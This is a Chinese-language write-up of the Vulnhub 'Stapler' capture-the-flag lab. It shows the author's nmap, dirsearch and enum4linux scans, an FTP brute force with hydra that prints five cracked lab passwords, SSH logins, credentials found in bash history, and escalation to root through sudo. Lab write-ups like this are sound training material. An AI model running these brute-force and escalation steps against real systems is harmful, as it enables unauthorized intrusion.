【writeup】Stapler靶机
【writeup】Stapler靶机
前言
靶机环境:https://www.vulnhub.com/entry/stapler-1,150/
kali攻击机IP:192.168.1.10
靶机IP:192.168.1.11
过程
整体思路如下
信息收集
主机发现
nmap扫描靶机IP为192.168.1.11
aaa@qq.com:~# nmap -sn 192.168.1.0/24
......
Nmap scan report for 192.168.1.11
Host is up (0.00023s latency).
MAC Address: 08:00:27:00:26:E0 (Oracle VirtualBox virtual NIC)
......
全端口扫描
nmap进行端口扫描,开放了ftp、ssh、dns等服务。
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
扫描网站目录
访问http访问,返回的是404,用dirsearch扫描了下网站目录,仅扫到了".bashrc"文件。
aaa@qq.com:~# dirsearch -u http://192.168.1.11 -E
......
[21:46:49] Starting:
[21:46:49] 200 - 4KB - /.bashrc
......
获取Samba相关信息
enum4linux扫描靶机,获取了:
- 可以匿名登录
- 可访问的共享目录有kathy和tmp
- 若干用户名
aaa@qq.com:~# enum4linux -a 192.168.1.11
......
[+] Server 192.168.1.11 allows sessions using username '', password ''
......
======================================
| OS information on 192.168.1.11 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.1.11 from smbclient:
[+] Got OS info for 192.168.1.11 from srvinfo:
RED Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
......
=========================================
| Share Enumeration on 192.168.1.11 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
[+] Attempting to map shares on 192.168.1.11
//192.168.1.11/print$ Mapping: DENIED, Listing: N/A
//192.168.1.11/kathy Mapping: OK, Listing: OK
//192.168.1.11/tmp Mapping: OK, Listing: OK
//192.168.1.11/IPC$ [E] Can't understand response:
......
smbclient连接共享目录能获取:
- smbclient //192.168.1.11/kathy
- kathy_stuff
- todo-list.txt
- backup
- vsftpd.conf
- wordpress-4.tar.gz
- kathy_stuff
- smbclient //192.168.1.11/tmp
- ls
todo-list文件内容提示为Initech, Kathy备份了重要文件。正好有个backup文件夹,backup中一个是ftp的配置信息文件,另一个打包的WordPress网站文件。ls文件的内容,猜测是提示tmp下原来有个“systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ”文件夹被删掉了或移动了。
- ls
ftp配置文件
先从ftp配置文件入手看下。匿名登录ftp后可以获取到note文件。根据note文件中的提示,猜测是用Elly账号登录ftp可以获取重要文件。
(Elly账户密码的获取,有尝试暴力**,但未成功,有些字典太大。实在这里也没找到其他办法之后,看了一个别人的writeup,作者在这里是**出了Elly的密码的,密码就是ylle。不过,这里倒是提醒了自己,**还是应该先尝试用已知信息生成一个字典,靶机如果可以**密码作为切入点的,一般应该也不会特别复杂。)
# 允许匿名登录
anonymous_enable=YES
anon_root=/var/ftp/anonymous
# 允许靶机的本地账号登录
local_enable=YES
# 对上传下载行为记录日志。
xferlog_enable=YES
# 日志文件路径注释掉了,不知道是不是相当于没启用日志记录。
#xferlog_file=/var/log/vsftpd.log
# 将用户限制在自己账号的根目录下,不能切换到其他目录。
chroot_local_user=YES
# 限制黑名单用户,不过这里并没有设置黑名单账号。
userlist_enable=YES
# 限制本地用户登录后的根目录为/etc。
local_root=/etc
mysql配置文件
从 mysqld.cnf 文件,获取mysql用户“mysql”,basedir和datadir和报错日志路径,secure-file-priv值为空,存在可利用的漏洞。
......
user = mysql
pid-file = /var/run/mysqld/mysqld.pid
socket = /var/run/mysqld/mysqld.sock
port = 3306
basedir = /usr
datadir = /var/lib/mysql
tmpdir = /tmp
lc-messages-dir = /usr/share/mysql
skip-external-locking
......
log_error = /var/log/mysql/error.log
......
secure-file-priv = ""
获取的用户名
汇总所有扫描到的用户名。
AParnell
barry
Barry
CCeaser
CJoo
Drew
DSwanger
Eeth
elly
ETollefson
IChadwick
jamie
JBare
jess
JKanode
JLipps
john
John
kai
kathy
Kathy
LSolum
LSolum2
MBassin
mel
MFrei
NATHAN
peter
RNunemaker
Sam
SHAY
SHayslett
SStroud
Taylor
www
zoe
WPScan扫描
- apache版本是2.4.18
- xmlrpc.php文件可访问,可能存在利用**账号密码的漏洞。
- 所用主题是bhost,版本过旧,可能存在漏洞。
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.18 (Ubuntu)
......
[+] XML-RPC seems to be enabled: https://192.168.1.11:12380/blogblog/xmlrpc.php
......
[+] WordPress theme in use: bhost
| [!] The version is out of date, the latest version is 1.4.5
Match: 'Version: 1.2.9'
......
渗透测试
暴力**
利用xhydra**了下ftp,跑出了5个账号密码
[21][ftp] host: 192.168.1.11 login: SHayslett password: SHayslett
[21][ftp] host: 192.168.1.11 login: elly password: ylle
[21][ftp] host: 192.168.1.11 login: JBare password: cookie
[21][ftp] host: 192.168.1.11 login: MFrei password: letmein
[21][ftp] host: 192.168.1.11 login: Drew password: qwerty
访问FTP
利用**的账号密码登录ftp,ftp登录后访问的就是/etc目录。尝试找了下是否有存放密码的或者备份的敏感,没找到可利用的突破口。(回头再看看别人writeup)
ssh登录Drew账号
利用**的账号密码ssh登录靶机。试了下应该只有SHayslett、JBare、Drew可以登录。三个账号权限猜测是一样的。登录后看了下当前账号下的历史执行命令,/home下其他账号的居然也能查看。每个看了下,只有JKanode用户下有敏感信息,获得了JKanode用户和Peter用户的账号密码。当前账号访问Peter账号下的文件也是提示权限不足。(这个我认为也算是一个提示)(这里如何仅限制了Peter用户,其他用户的文件可以访问,暂时还没弄清)
aaa@qq.com ~ % sudo -l
......
User peter may run the following commands on red:
(ALL : ALL) ALL
ssh登录Peter账号
利用Peter账号密码登录后,sudo -l发现Peter用户直接具备root权限。获取flag.txt文件内容。
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
上一篇: 3dsmax怎么制作一个雨雾玻璃的材质?
下一篇: 网站优化建议之网站优化的基本流程